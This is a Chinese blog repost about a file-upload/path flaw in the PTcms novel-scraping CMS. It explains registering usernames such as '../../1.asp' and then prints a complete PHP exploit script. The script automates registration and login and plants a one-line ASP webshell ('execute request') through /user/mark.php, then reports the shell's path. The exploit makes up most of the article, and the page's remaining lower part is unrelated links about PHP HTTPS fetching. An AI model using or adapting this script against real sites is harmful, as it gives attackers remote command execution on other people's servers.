php小偷cookie,ptcms小说小偷程序 最新EXP漏洞

最新推荐文章于 2022-05-13 14:35:02 发布
最新推荐文章于 2022-05-13 14:35:02 发布
阅读量481 收藏
点赞数
文章标签: php小偷cookie

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

https://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

//error_reporting(0);

print_r('

+---------------------------------------------------------------------------+

PTcms Code written Exploit

by:cfking@90sec.org

welcome to [url]www.90sec.org[/url]

+---------------------------------------------------------------------------+

'

);

if($argv[1]==null){

print_r('

Usage: php '.$argv[0].' url

Example:

php '.$argv[0].' [url]www.site.com[/url]

');

;exit;

}

$url=$argv[1];

$user=substr(md5(time()),0,10).".asp";

$settime=date("Y-m-d",time());

$to=postzend($url,"username=$user&password=hacker&chk_password=hacker&dosubmit=%CF%C2%D2%BB%B2%BD");

if($to!==null){

postzend($url,"comeurl=http%3A%2F%2Fwww.cscity.net%2Fuser%2Findex.php&username=$to&password=hacker&cookietime=31536000&dosubmit=%CC%E1+%BD%BB",'login','/user/logchk.php');

$cookie="logtime=$settime; logip=110.110.110.110; pt_userlv=%B7%B2%C8%CB; pt_userpmnum=0; pt_username=$to";

postzend($url,'1=%3C%25execute+request%28chr%2835%29%29%25%3E&dochange=%D0%DE+%B8%C4','exploit','/user/mark.php',$cookie);

}

function postzend($url,$content,$type='reg',$path='/user/reg.php?step=3',$cookie='ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON'){

global $user;

$host=$url;

$port="80";

$data = "POST $path HTTP/1.1\r\n";

$data .= "Host: ".$host."\r\n";

$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2\r\n";

$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";

$data .= "Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\n";

$data .= "Referer: http://$host/user/reg.php?step=2\r\n";

$data .= "Cookie: $cookie\r\n";

$data .= "Connection: keep-alive\r\n";

$data .= "Content-Type: application/x-www-form-urlencoded\r\n";

$data .= "Content-Length: ".strlen($content)."\r\n\r\n";

$data .= $content."\r\n";

$ock=fsockopen($host,$port);

if (!$ock) {

echo "[-] No response from $host \n";

die;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp .=fgets($ock, 1024);

}

if($type=='reg'){

$tag="注册成功";$msg="Reg Successful\n[-] shellpath [-] \nhttp://$host/data/user/$user/mark.ptv";

}

if($type=='login'){$tag="登录成功";$msg="Login Successful";}

preg_match("/

(.*?)
/", $exp, $arr);

$result=explode(",",$arr[1]);

if($result[0]=="$tag"){

echo "[*] $msg \n";

return $user;

}else{

preg_match("/

(.*?)
/", $exp, $arrs);

if(is_array($arrs)){

echo "[*] Exploit Successful\n";

echo "[*] The pass # \n";

}else{

echo "[-] Exploit Failed\n";

}

return false;

exit;

}

}

?>

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3108.html

小爽无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新小说系统自动采集PTCMS.rar_PTCms小说系统_ptcms_小说_小说聚合程序_小说采集
09-15
ptcms小说聚合程序,高质量小说免费阅读,在线听书
LNMPA中php无法获取$_SERVER['HTTPS']的解决方法
gdali的专栏
03-03 2190
之前介绍过LNMPA配置SSL的方法,但是只是配置了nignx,因为在lnmpa中,nignx做前端,apache做后端,所以导致php无法获取$_SERVER['HTTPS']的值。 下面介绍解决这个问题的办法: 1、在/usr/local/nginx/conf/proxy.conf 最后面加上 proxy_set_header X-Forwarded-Proto $scheme; 2、在
php中抓取https页面,php抓取https url网页内容方法
weixin_35757736的博客
03-18 988
在开发PHP 应用过程中,有时候需要获取https网页的内容,下面得方法,可以参考下。直接用file_get_contents,会报错;$url = (https://xxx.com"); file_get_contents($url);错误:Warning: file_get_contents(https://xxx.com) [function.file-get-contents]: fail...
snoopy php https_snoopy php 无法获取https网页内容
weixin_42510670的博客
03-08 227
获取http内容可以获取到,但获取https的时候就是不能获取到相关内容。测试代码如下:(测试https时,是将http://www.xxxx.com改成https://www.xxxx.com)include "Snoopy.class.php";$snoopy = new Snoopy;$snoopy->user = "joe";$snoopy->pass = "bloe";if(...
PHP中file_get_contents函数抓取https地址出错的解决方法(两种方法)
第7维度 - 日常笔记
04-30 6278
方法一: 在php中,抓取https的网站,提示如下的错误内容: Warning: file_get_contents() [function.file-get-contents]: failed to open stream: Invalid argument in I:Webmyphpa.php on line 16 打开php.ini文件找到 ;extension=php_openss...
PHP抓取https域名,出现CURLE_SSL_CACERT_BADFILE (77)
刘俊龙的博客
07-02 1257
问题描述,下面情况表示没找到cacert.pem证书 CURLE_SSL_CACERT_BADFILE (77) Fatal error: Uncaught GuzzleHttp\Exception\RequestException: cURL error 77: error setting certificate verify locations: CAfile: C:\Users\Administrator\Downloads\cacert.pem 解决办法 1、直接关闭证书检查。 2、下载证
小偷程序PHP 搜狗)
拥的博客
11-29 342
<?php if(empty($_GET['key'])){ echo '请输入关键词,域名上加?key=';exit; } /**************************获取搜搜内容***********************************/ $key = $_GET['key']; mb_convert_encoding($key,'utf-8','gb23...
PHP实现小偷程序实例
10-21
本篇文章主要介绍了PHP实现小偷程序实例,实现了抓取网页咨询和商品信息的功能,具有一定的参考价值,感兴趣的小伙伴们可以参考一下。
PTCMS小说网整站.zip
05-31
2020最新PTcms修复版,下载就可以用,包含sql文件,四种模板,pc\wap等各种,自适应手机显示
修复phpcms自带采集无法采集https网站内容
fengye002011的博客
07-24 2409
无法采集https的网站内容主要是https不支持file_get_contents获取内容,所以可以考虑采用curl的方式获取。(需要开启curl,可以在pathinfo里边查看) (1)打开phpcms\modules\collection\classes\collection.class.php 在类里边添加新函数: protected static function curl_requ...
本地php环境无法请求https,缺少证书解决方案
一个人的Code博客
05-13 1229
1、下载本地需要的证书 链接:https://pan.baidu.com/s/1HiBF5082pkkgvt2DennJTw 提取码:jdu4 2、找到php安装路径,把下载的证书放入php安装根目录 3、修改php.ini,文件中搜索curl.cainfo,把证书地址添加上, 4、重启php,搞定 ...
前后端交互php中 url无法获取,https无法获取
大大黄的博客
08-30 678
调用第三方api https获取不到,找了一下午终于找到这篇解决方案 在php中获取网页数据使用curl和file_get_contents,但是在抓取https内容时抓取不到内容,解决方法如下: curl $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); ​ curl_setopt($ch,CURLOPT_HEADER,0); //...
php httpclient 证书,实现抓取HTTPS握手时证书的客户端
weixin_35486456的博客
03-10 251
前言由于一些很神奇的原因,我们需要用PHP实现从指定的IP获取HTTPS握手时的证书信息,其实在实现这个客户端之前有两种可行的方法。大概是脸黑的原因吧,这两种方法在这里放弃了,由于我们的线上服务器的CURL的版本过低,导致第一种方法无法实现,而直接升级的风险不可控,所以第一种方案就下马了。而第二种方案需要在线上服务器开启PHP的exec等危险函数,所以第二种方案也夭折了。最终只能自己动手实现PHP...
PHP中file_get_contents函数抓取https地址出错的解决方法
wbj16116的博客
03-07 5037
php中,抓取https的网站,提示如下的错误内容:Warning: file_get_contents() [function.file-get-contents]: failed to open stream: Invalid argument in I:Webmyphpa.php on line 16打开php.ini文件找到 ;extension=php_openssl.dll ,去掉双...
php函数file_get_contents无法获取到https链接内容问题使用curl的解决方案
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
03-06 514
file_get_contents() 把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。 file_get_contents() 在使用HTTPS协议时,是无法正常获取内容的。此时,可以使用curl代替 curl封装函数 function getAPI($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_.
php 无法获取https,解决file_get_contents无法请求https连接的方法
weixin_39630106的博客
03-10 579
错误: Warning: fopen() [function.fopen]: Unable to find the wrapper "https" - did you forget to enable it when you configured PHP?解决方案有3:1.windows下的PHP,只需要到php.ini中把extension=php_openssl.dll前面的;删掉,重启服务就...
ptcms采集规则教程
最新发布
05-09
PTCMS 是一个非常受欢迎的 PHP 开源 CMS 系统,除了它自带的采集规则外,您也可以自行编写采集规则,进一步扩展其采集能力和应用场景。编写一个完整的采集规则并不难,但需要注意的问题还是不少的。 首先需要明确的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值